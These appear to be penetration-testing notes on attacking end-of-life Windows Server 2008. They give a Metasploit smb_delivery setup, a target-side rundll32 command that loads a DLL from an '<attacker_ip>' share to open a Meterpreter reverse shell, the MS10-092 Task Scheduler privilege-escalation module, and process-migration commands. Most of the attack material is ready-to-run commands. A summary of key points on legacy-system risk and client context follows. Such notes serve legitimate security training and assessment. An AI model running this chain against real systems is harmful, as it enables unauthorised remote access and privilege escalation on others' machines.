windows-server

Windows Server 2008 Enumeration

wmic qfe
powershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1
powershell.exe -ExecutionPolicy Bypass -Command "Import-Module .\Sherlock.ps1; Find-AllVulns"

Metasploit (smb_delivery)

msf6 exploit(windows/smb/smb_delivery) > use exploit/windows/smb/smb_delivery
msf6 exploit(windows/smb/smb_delivery) > set SRVHOST <attacker_ip>
msf6 exploit(windows/smb/smb_delivery) > set LHOST <attacker_ip>
msf6 exploit(windows/smb/smb_delivery) > set LPORT 4444
msf6 exploit(windows/smb/smb_delivery) > set target 0
msf6 exploit(windows/smb/smb_delivery) > exploit

Target (Run from cmd.exe)

rundll32.exe \\<attacker_ip>\\lEUZam\\test.dll,0

Metasploit (ms10_092_schelevator)

msf6 exploit(windows/local/ms10_092_schelevator) > use exploit/windows/local/ms10_092_schelevator
msf6 exploit(windows/local/ms10_092_schelevator) > set SESSION 1
msf6 exploit(windows/local/ms10_092_schelevator) > set LHOST <attacker_ip>
msf6 exploit(windows/local/ms10_092_schelevator) > set LPORT 4443
msf6 exploit(windows/local/ms10_092_schelevator) > exploit

Meterpreter Commands

meterpreter > getpid
meterpreter > ps
meterpreter > migrate <pid>
meterpreter > background
meterpreter > getuid
meterpreter > sysinfo

Key Points:

• EOL Status:

  • Windows Server 2008/2008 R2 reached end-of-life on January 14, 2020.

• Security Differences:

  • Older versions lack many security enhancements found in newer Windows Server releases (e.g., Enhanced Windows Defender ATP, Credential Guard, Device Guard, AppLocker, Control Flow Guard).

• Case Study Importance:

  • Understanding the client's business context is crucial when dealing with legacy systems.

  • Recommendations should consider the impact on critical applications and potential mitigation strategies (e.g., network segmentation).

• Enumeration and Exploitation:

  • Tools like Sherlock and Windows-Exploit-Suggester can identify missing patches and potential vulnerabilities.

  • Manual enumeration of patch levels is also possible.

  • wmic qfe is used to query the current patch level.

• Exploitation Walkthrough:

  • Example uses the MS10-092 Task Scheduler vulnerability for privilege escalation.

  • Steps include:

    • Obtaining a Meterpreter reverse shell using smb_delivery.

    • Migrating to a 64-bit process.

    • Using the ms10_092_schelevator module.

    • The example also shows how to use ps and migrate within metasploit.

• Key tools and commands:

  • wmic qfe

  • Sherlock.ps1

  • Windows-Exploit-Suggester

  • Metasploit (smb_delivery, ms10_092_schelevator)

  • Meterpreter commands (getpid, ps, migrate, getuid, sysinfo)

In essence:

• Windows Server 2008/2008 R2 presents unique security challenges due to its EOL status and lack of modern security features.

• Thorough enumeration and careful consideration of the client's environment are essential when assessing these systems.

• Older operating systems often have many available exploits.